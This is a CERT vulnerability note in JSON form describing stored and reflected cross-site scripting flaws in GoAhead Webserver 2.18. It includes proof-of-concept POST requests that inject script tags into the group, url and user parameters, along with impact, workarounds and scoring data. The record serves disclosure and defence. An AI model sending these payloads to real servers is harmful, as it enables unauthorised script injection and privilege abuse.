{"vuid":"VU#384427","idnumber":"384427","name":"GoAhead Webserver multiple stored XSS vulnerabilities","keywords":["goahead","webserver","xss","post","csrf"],"overview":"GoAhead Webserver 2.18, and possibly previous or newer versions, are vulnerable to multiple stored and reflective cross site scripting (XSS) vulnerabilities.","clean_desc":"GoAhead Webserver software fails to sanitize POST requests sent to multiple functions. As a result, stored and reflective cross site scripting (XSS) attacks can be conducted. An attacker can inject JavaScript code that will be run each time the specified webpage is accessed by inserting JavaScript code in the affected parameter. According to the reporter, the following webpages and parameters are affected by stored and reflective XSS vulnerabilities: Stored XSS in group parameter of addgroup.asp. POST /goform/AddGroup HTTP/1.1\ngroup=<script>alert(1337)</script>&privilege=4&method=1&enabled=on&ok=OK Results: Reflected XSS displayed in addgroup.asp, stored XSS in: adduser.asp, addlimit.asp, delgroup.asp. Stored XSS in url parameter of addlimit.asp POST /goform/AddAccessLimit HTTP/1.1\nurl=<script>alert(1337)</script>&group=test&method=3&ok=OK Results: Stored when user requests dellimit.asp. Stored XSS in adduser.asp, User ID parameter. Note: for this to work, there must be at least one valid group created in \naddgroup.asp. In this example, you can swap out the group=<script>alert(1337) \nfor whichever group name you added.  password= and passconf= can also be \nmodified to whichever password you want the new user to have. 
POST /goform/AddUser HTTP/1.1\nuser=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&group=%3Cscript%3Ealert%281337%2\n9%3C%2Fscript%3E&enabled=on&password=test&passconf=test&ok=OK Result: Reflected in reply, stored in: deluser.asp,dspuser.asp.","impact":"An attacker with access to the GoAhead Webserver can conduct a cross site scripting attack, which could result in information leakage, privilege escalation, and/or denial of service.","resolution":"We are currently unaware of a practical solution to this problem.","workarounds":"Restrict access: As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS or CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing a GoAhead Webserver using stolen credentials from a blocked network location.","sysaffected":"The reporter was unable to confirm if any previous or newer","thanks":"Thanks to Silent Dream for reporting this vulnerability.","author":"This document was written by Michael 
Orlando.","public":[],"cveids":[""],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2011-09-15T18:57:17Z","publicdate":"2011-10-10T00:00:00Z","datefirstpublished":"2011-10-10T12:06:23Z","dateupdated":"2011-10-10T12:58:47Z","revision":21,"vrda_d1_directreport":"1","vrda_d1_population":"3","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"2","cam_population":"4","cam_impact":"9","cam_easeofexploitation":"18","cam_attackeraccessrequired":"20","cam_scorecurrent":"0.486","cam_scorecurrentwidelyknown":"5.346","cam_scorecurrentwidelyknownexploited":"10.206","ipprotocol":"","cvss_accessvector":"","cvss_accesscomplexity":"","cvss_authentication":null,"cvss_confidentialityimpact":"","cvss_integrityimpact":"","cvss_availabilityimpact":"","cvss_exploitablity":null,"cvss_remediationlevel":"","cvss_reportconfidence":"","cvss_collateraldamagepotential":"","cvss_targetdistribution":"","cvss_securityrequirementscr":"","cvss_securityrequirementsir":"","cvss_securityrequirementsar":"","cvss_basescore":"","cvss_basevector":"","cvss_temporalscore":"","cvss_environmentalscore":"","cvss_environmentalvector":"","metric":0.486,"vulnote":null}